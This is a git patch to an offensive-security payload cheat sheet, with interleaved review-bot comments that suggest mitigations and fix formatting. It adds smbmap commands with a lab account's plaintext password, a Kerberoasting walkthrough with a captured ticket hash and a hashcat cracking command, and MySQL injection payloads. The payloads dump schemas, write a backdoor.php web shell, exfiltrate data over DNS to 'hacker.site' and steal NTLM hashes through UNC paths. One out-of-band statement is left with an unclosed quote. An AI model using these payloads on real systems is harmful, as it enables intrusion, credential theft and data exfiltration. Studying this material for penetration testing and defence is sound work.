From d5478d1fd69ee8dda842a746107c6f0bf8606a1f Mon Sep 17 00:00:00 2001 From: Swissky Date: Tue, 25 Dec 2018 19:38:37 +0100 Subject: [PATCH] AWS Pacu and sections + Kerberoasting details --- AWS Amazon Bucket S3/README.md | 9 +++++ .../Active Directory Attack.md | 16 +++++++- SQL injection/MySQL Injection.md | 39 ++++++++++++++++--- 3 files changed, 56 insertions(+), 8 deletions(-) diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md index af9e326..0ac413b 100644 --- a/AWS Amazon Bucket S3/README.md +++ b/AWS Amazon Bucket S3/README.md @@ -1,5 +1,12 @@ # Amazon Bucket S3 AWS +## Tools + +- [Pacu - The AWS exploitation framework, designed for testing the security of Amazon Web Services environments](https://github.com/RhinoSecurityLabs/pacu) + + +## AWS Configuration + Prerequisites, at least you need awscli ```bash @@ -21,6 +28,8 @@ aws configure --profile nameofprofile then you can use *--profile nameofprofile* in the aws command +## Open Bucket + By default the name of Amazon Bucket are like http://s3.amazonaws.com/[bucket_name]/, you can browse open buckets if you know their names ```bash diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index d489d42..6b27442 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -82,6 +82,14 @@ mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache" ## Open Shares +```powershell +smbmap -H 10.10.10.100 # null session +smbmap -H 10.10.10.100 -R # recursive listing +smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 +``` + +or + ```powershell pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share ls # list files 
@@ -333,8 +341,12 @@ TODO ### Kerberoast +> "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names) + +Any valid domain user can request a kerberos ticket for any domain service with `GetUserSPNs`. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as. + ```powershell -$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request-user Administrator > +$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies 
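Review bot: The added Kerberoast paragraph describes the ticket request and the offline cracking step but gives the reader no way to recognise or prevent the technique. Separately, the quoted SPN definition links to the `fr-fr` locale of the Microsoft page although the surrounding text is English, so I would switch that path segment to `en-us`. I would also add one line after the paragraph, for example `Mitigation: give SPN-bearing accounts long random passwords (or use gMSA), prefer AES-only encryption types, and alert on Event ID 4769 requests with ticket encryption type 0x17.` The `$krb5tgs$23$` output shown in the following hunk is an RC4 (etype 23) ticket, which is what that event filter matches. The powershell fence opened in this hunk closes outside it.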
@@ -345,7 +357,7 @@ active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC= $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43c360c29c154b012c$c54c7be163ae6c323ae6b5fc45a1eacee2f4903deec785cd689f4551e023775c7e7772fe85e3fb8374ca95534d72c971ba80e8b6d4ef3c3b8439dc54031540133cbcbd5f7b39d622733d198eec594c0cd181ab4696a6ad12744d1ddd2d3e2c6dd33b4daedbc9cae75e8ff2652c80421b0fa3a61ddf2cabeea462c44e0f6d9a6436717e0621bb4e0fe8bd3cf36156b4b2f7b81d651f70baf34a0b3071858b5034b895c25a0d3c67044c849d5952c381a0078a86ae562810a93d9c7bcc8311255cc9eda35a9c4d4d43ff1cc29108056285c954f3c633332ff0cb0c9c0f1896c792b247c8d25f5dd71802728fc99bb22709337b5596ab0e2045110b0b005b03351e9f71a65b48e8259f6191ce95d4e5794846c61c3abccf0f5f72a8679fb0dc0777720f5551ad99c9c9ab0955f85ee211d40b01fcaece7868960b2063923aa0f59e17b347f3308087707e95cad54b9df8179728821cf54cb204c5c2e571d9a66c8ec40b090305aa32e90a90d25ea37be6d8f8a83c683a8b69d386f9edb970596bc56fa02971f69c7e073b8de1213d9caa75ab652e5c5b99cadace9dd7d15d1d530309ea39ca1b7c6009ae3342796a6bdea084622ee95cbade437659e37363b848bad2186e3a9f7dec66e1e496db32d55eda8fb926f057996638646dcc662ed226788ddf36304dc70eaca91b26cb7180341f417fad91117ee10212c69423abd42769cbf891b51d736ffe474899eec8df64abef319d3c6dc379f2bfda33de7c3a1a50d6ece564d4559c77f560b7506fa2f1c9af7162f1247ea35706aafffde48b8cc48b1ec8e99d99ac81dc02f55f43f9726d746383cd076e7199070ff8100846ba9dc2235e92d0c7dac1f33da5fe7901e02f0566030d7c7e02535d6a300292a04e6c32d0d74d37679c2617750f5920d9c697a30c883519bc6b5a916eec354459c7f248c783bd79c436a7e8c463a8981a9e000d21c2d00c7e8468cff0ab695cb3aa4f14f149d1fafb4d656bcd1f67b747fc4c2d648466a386774853db8d50c22df57e747085142f98f5f06191c243b9dbf671da64228364f058c7e2e53a80fdde7f6dc2f25459a09fb2583757953247c222d64f49bc12d461d2e5aa572ceba2605d7eafd6031405ee422ac35cbf041b4fd28e58d871406e053d1a806de49056791646c175bf0d2aaa19f844bfc885520e19c391702be6ae61122fceac32b689764334908a4eaf7c69974a9519ebb068a15c087955fb402416bd184fd2 ``` -Then crack the hash with 
hashcat or john +Then crack the ticket with hashcat or john ```powershell hashcat -m 13100 -a 0 hash.txt crackstation.txt diff --git a/SQL injection/MySQL Injection.md b/SQL injection/MySQL Injection.md index f90978a..1d7207d 100644 --- a/SQL injection/MySQL Injection.md +++ b/SQL injection/MySQL Injection.md @@ -1,12 +1,12 @@ # MYSQL Injection -## MySQL +## MYSQL ```sql # MYSQL Comment /* MYSQL Comment */ /*! MYSQL Special SQL */ -/*!32302 10*/ Comment for MySQL version 3.23.02 +/*!32302 10*/ Comment for MYSQL version 3.23.02 ``` ## Detect columns number @@ -21,7 +21,7 @@ order by 3 order by XXX ``` -## MySQL Union Based +## MYSQL Union Based ```sql UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata @@ -30,7 +30,7 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_sc UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+... ``` -## MySQL Error Based - Basic +## MYSQL Error Based - Basic ```sql (select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) @@ -109,7 +109,7 @@ OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) ' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- ``` -## MySQL DIOS - Dump in One Shot +## MYSQL DIOS - Dump in One Shot ```sql (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)# 
@@ -126,4 +126,31 @@ SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php' ``` -## References \ No newline at end of file +## MYSQL Out of band + +```powershell +select @@version into outfile '\\\\192.168.0.100\\temp\\out.txt'; +select @@version into dumpfile '\\\\192.168.0.100\\temp\\out.txt +``` + +DNS exfiltration + +```sql +select load_file(concat('\\\\',version(),'.hacker.site\\a.txt')); +select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874)) +``` + +UNC Path - NTLM hash stealing + +```sql +select load_file('\\\\error\\abc'); +select load_file(0x5c5c5c5c6572726f725c5c616263); +select 'osanda' into dumpfile '\\\\error\\abc'; +select 'osanda' into outfile '\\\\error\\abc'; +load data infile '\\\\error\\abc' into table database.table_name; +``` + + +## References + +- [MySQL Out of Band Hacking - @OsandaMalith](https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf) \ No newline at end of file
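Review bot: The first fence in the new "MYSQL Out of band" section is tagged `powershell` although both statements are SQL, and its second statement (`... into dumpfile '\\\\192.168.0.100\\temp\\out.txt`) has no closing quote or semicolon, so the listing does not parse as written. Tag it `sql` like the two fences below it and balance the literal. The section also omits the preconditions, which are the same controls a defender relies on: the statements need the FILE privilege, a permissive `secure_file_priv`, and a Windows server that resolves UNC paths. I would add a line under the heading such as `Requires the FILE privilege and an empty secure_file_priv; UNC paths resolve only on Windows servers. Setting secure_file_priv to a dedicated directory (or NULL) and blocking outbound SMB (TCP 445) from the database host prevents these.`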